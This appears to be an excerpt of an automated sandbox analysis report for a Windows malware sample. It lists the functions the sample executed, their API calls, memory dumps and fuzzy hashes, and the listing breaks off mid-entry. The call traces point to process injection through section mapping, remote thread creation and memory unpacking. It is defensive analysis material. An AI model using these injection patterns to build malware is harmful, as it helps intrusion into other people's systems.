librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00514D70), ref: 00418A1F
GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418A5C
VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418A7B

Strings

, xrefs: 00418985

Memory Dump Source

Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
Instruction ID: 50ffa957652d6c793d686c1d0a186ca9e6a8cd8bf043fc734a0081a481964278
Opcode Fuzzy Hash: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
Instruction Fuzzy Hash: B4312918518680CAEB01DB78FC057923B66AB75709F04E1B8D14C8B7B1D7BB051E9B6A

Function 006417D2 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006417FA
Module32First.KERNEL32(00000000,00000224), ref: 0064181A

Memory Dump Source

Source File: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0063E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63e000_hehcrfb.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 4954287a981467cda71b11da07ee6330484a1f8647e48573a15237c190963d38
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CBF0F6321003106FD7203BF4988CBAF77EEEF4A720F100528F652991C0DB70EC854660

Function 005F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E

Memory Dump Source

Source File: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5f0000_hehcrfb.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 00641491 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006414E2

Memory Dump Source

Source File: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0063E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63e000_hehcrfb.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8405aae58695650e6451e26fe30541727dfd333c6564807de2a0821a33172a7c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B6112B79A00208EFDB01DF98C985E98BFF5AF08350F058094F9499B362D771EA90DB80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00418910 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00514D6C,00418FA2), ref: 00418918

Memory Dump Source

Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16

Non-executed Functions

Function 00418B20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00418B34
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418B46
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0

Strings

-, xrefs: 00418BBD

Memory Dump Source

Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd

Similarity

API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
String ID: -
API String ID: 2332831159-2547889144
Opcode ID: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
Instruction ID: 677527fee2e31da48b0f78a64988b8bc3df04c21d5f76ad85ec8a00fc73180d6
Opcode Fuzzy Hash: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
Instruction Fuzzy Hash: 94116B71A49304BBE7209FA0EC46FEA3F74AB08B11F204129FB04691C1CAB82981875F

Function 00418B56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0

Strings

-, xrefs: 00418BBD

Memory Dump Source

Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd

Similarity

API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
String ID: -
API String ID: 1414951042-2547889144
Opcode ID: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
Instruction ID: 0a3812f3688d595350d52c489f49ccd1e134694a55c2d67ff5c1230b235e6e50
Opcode Fuzzy Hash: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
Instruction Fuzzy Hash: B4F0C871B85304ABD7208F94EC46BD97B60FB09725F214259F6046E1C1C7B52951DB8B

Function 00418BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(0041B398,?,00000000), ref: 00418C17
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418C32
HeapDestroy.KERNEL32(00000000), ref: 00418C51
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418C60

Memory Dump Source

Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
Instruction ID: 756bc8bfdf9d8d10eb6f9b921beda427f38e019a2e514af8c0d7042b50038681
Opcode Fuzzy Hash: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
Instruction Fuzzy Hash: E901D8B4A012049BCB20AF64ED45BDA3778EB18745F40407BFB05A7290DE345984CFAA

Analysis Process: 4470.exePID: 7960, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	29.3%
Signature Coverage:	0%
Total number of Nodes:	164
Total number of Limit Nodes:	7

Executed Functions

Function 004189C0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 310
libraryfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418ADB
SetFocus.USER32(00000000), ref: 00418AE4
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418AEF
FindAtomW.KERNEL32(00000000), ref: 00418AF6
SearchPathA.KERNEL32(0041A3E4,0041A3CC,0041A3B8,00000000,?,?), ref: 00418B1A
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418B22
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418B3A
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418B61
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418B6D
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418B83
GetEnvironmentStringsW.KERNEL32 ref: 00418B89
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418BCE
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418BDD
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418BE6
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BFB
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418C0C
SetCommMask.KERNELBASE(00000000,00000000), ref: 00418C35
GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418C4B
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418C7A
GetComputerNameW.KERNEL32(?,?), ref: 00418C8E
GetConsoleAliasExesLengthW.KERNEL32 ref: 00418C94
GetBinaryType.KERNEL32(0041A3F0,?), ref: 00418CA6
PurgeComm.KERNEL32(00000000,00000000), ref: 00418CAE
LoadLibraryA.KERNELBASE(0041A410), ref: 00418D22
MoveFileW.KERNEL32(00000000,00000000), ref: 00418D57
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D7E

Strings

}$, xrefs: 00418D85
k`, xrefs: 00418D5D

Memory Dump Source

Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_4470.jbxd

Similarity

API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
String ID: k`$}$
API String ID: 87775671-956986773
Opcode ID: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
Instruction ID: 14be8ff56781b1d00f5d5c610e1110d06a152b2d889af403ee48b93a4b1bf100
Opcode Fuzzy Hash: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
Instruction Fuzzy Hash: EDB1C671901224ABCB209B65EC54BDF7B79EF59310F00806EF609A31A1DB385E84CFAD

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_4470.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 0216003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D

Strings

cess, xrefs: 0216018D
kernel32.dll, xrefs: 0216008F, 02160095

Memory Dump Source

Source File: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2160000_4470.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

Function 00418680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00513D70), ref: 0041875F
GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041879C
VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004187BB

Strings

, xrefs: 004186C5

Memory Dump Source

Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_4470.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
Instruction ID: 2155bd9b31e59c350c635bb378a89ddac8c1e1b9edbf8731bf03073443d6ecc1
